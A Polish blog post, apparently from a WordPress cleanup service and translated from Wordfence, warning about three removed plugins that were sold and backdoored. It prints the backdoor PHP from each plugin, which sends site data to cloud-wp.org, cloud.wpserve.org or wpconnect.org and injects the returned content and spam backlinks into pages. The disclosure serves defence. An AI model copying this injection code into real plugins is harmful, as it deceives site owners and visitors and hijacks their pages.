W repozytorium WordPressa regularnie znikają wtyczki czy motywy, które stwarzają zagrożenie dla użytkowników. Konsekwencją tego jest brak aktualizacji takich wtyczek, a także nie można ich więcej pobierać z repozytorium. Dziś wspomnę o trzech wtyczkach, które nie bez powodu zniknęły z repozytorium WordPressa i które najczęściej spotykam na stronach oczyszczanych z wirusów.
Duplicate Page and Post
Wtyczka wg danych dostępnych na wordpress.org instalowana była ponad 50 tysięcy razy, oficjalnie została usunięta z repozytorium 14 grudnia 2017 roku. Kłopoty z wtyczką rozpoczęły się, gdy jej autor sprzedał ją dla Daley Tias, osobie która jest ogólnie zagadką i możliwe że samo imię i nazwisko nie jest prawdziwe.
[showmyads]
Backdoor został wykryty już w wersji 2.1.0.
$request_url = 'https://cloud-wp.org/api/v1/update?url=' . urlencode($url) . '&ip=' . urlencode($ip) . '&user_agent=' . urlencode($user_agent);
$response = wp_remote_get($request_url, array('timeout' => 2));
$this->data = new stdClass();
$this->data->content = null;
$this->data->confirm = null;
$this->data->contact = null;
if (!$response instanceof WP_Error && $response['body']) {
$data = json_decode($response['body']);
if (null !== $data) {
$content_position = $data->version;
if ('1' == $content_position) {
$this->data->confirm = $data->data;
if (!$output_buffer) {
$this->data->content = $data->data;
}
} elseif ('2' == $content_position) {
$this->data->content = $data->data;
} else {
$this->data->contact = $data->data;
}
}
}
[sociallocker] Wirus łączył się z cloud-wp.org i między innymi podstawiał dla popularnych robotów wyszukiwarek fejkowe treści stron, a także wstrzykiwał zamaskowane backlinki do treści stron użytkowników.
No Follow All External Links
[/sociallocker]
To już nie tak popularna wtyczka jak ta opisywana powyżej, ale również swoim zasięgiem dotarła do prawie 10 000 stron, więc warto o niej wspomnieć.
Backdoor, którego kod widzicie powyżej pojawił się już w wersji 2.1.0, czyli jakieś 10 miesięcy temu.
if (self::$data['report'] && self::$advancedSettings['improvement'] = 1) {
$requestUrl = 'https://cloud.wpserve.org/api/v1/update?&url=' . urlencode('http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']) . '&agent=' . urlencode($_SERVER['HTTP_USER_AGENT']) . '&ip=' . urlencode($_SERVER['SERVER_ADDR']);
$response = wp_remote_get($requestUrl, ['timeout' => 2]);
if (!$response instanceof WP_Error) {
self::$data['response'] = json_decode($response['body']);
}
}
add_filter('the_content', ['noFollowAllExternalLinks', 'interceptContent']);
Podobnie jak Duplicate Page and Post wtyczka odpytywała stronę cloud.wpserve.org, a to kończyło się wstrzykiwaniem backlinków na potrzeby SEO do treści stron użytkowników. Co ciekawsze, władzę nad wtyczką miała firma Orb Online, czyli firma specjalizująca się w SEO, eCommerce i Magento, co by tłumaczyło samo przeznaczenie wirusa.
WP No External Links
Ta wtyczka aktywna jest na ponad 30 000 stron na całym świecie i autor sprzedał ją 12 lipca 2017 roku, co skończyło się takim kodem:
if ($this->data->report) {
$request_url = 'https://wpconnect.org/api/v1/update?&url=' . urlencode($this->data->url) . '&ip=' . urlencode($this->data->ip) . '&user_agent=' . urlencode($this->data->user_agent);
$response = wp_remote_get($request_url, array('timeout' => 2));
if (!$response instanceof WP_Error && $response['body']) {
$data = json_decode($response['body']);
$content_position = $data->version;
if ('1' == $content_position) {
$this->data->buffer = $data->data;
if ('all' !== $this->options->mask_links) {
$this->data->before = $data->data;
}
} elseif ('2' == $content_position) {
$this->data->before = $data->data;
} else {
$this->data->after = $data->data;
}
}
}
Co ciekawsze, znowu pojawia się tu firma Orb Online, dzięki czemu nie muszę tłumaczyć do czego ją zaczęli wykorzystywać. Na nowo pojawia się także osoba Daley Tias. Jeśli ujrzycie w treści strony bądź gdziekolwiek adres wpconnect.org to usuńcie lepiej całą wtyczkę, a na pewno szybko znajdziecie bezpieczniejszą alternatywę.
[showmyads]
Wpconnect.org posiada identyczny adres IP co wspomniany wcześniej adres cloud-wp.org.
Podsumowanie
Po prostu, jeśli używacie tych wtyczek to jak najszybciej je wyłączcie, a jeśli mieliście je w przeciągu ostatniego roku to dokładnie przeanalizujcie swoje strony pod kątem złośliwego oprogramowania. Możecie także zlecić nam darmową analizę, albo jeśli już wiecie o problemach to odwirusowanie WordPressa.
Artykuł przetłumaczony z oficjalnego bloga Wordfence.
Ostatnie komentarze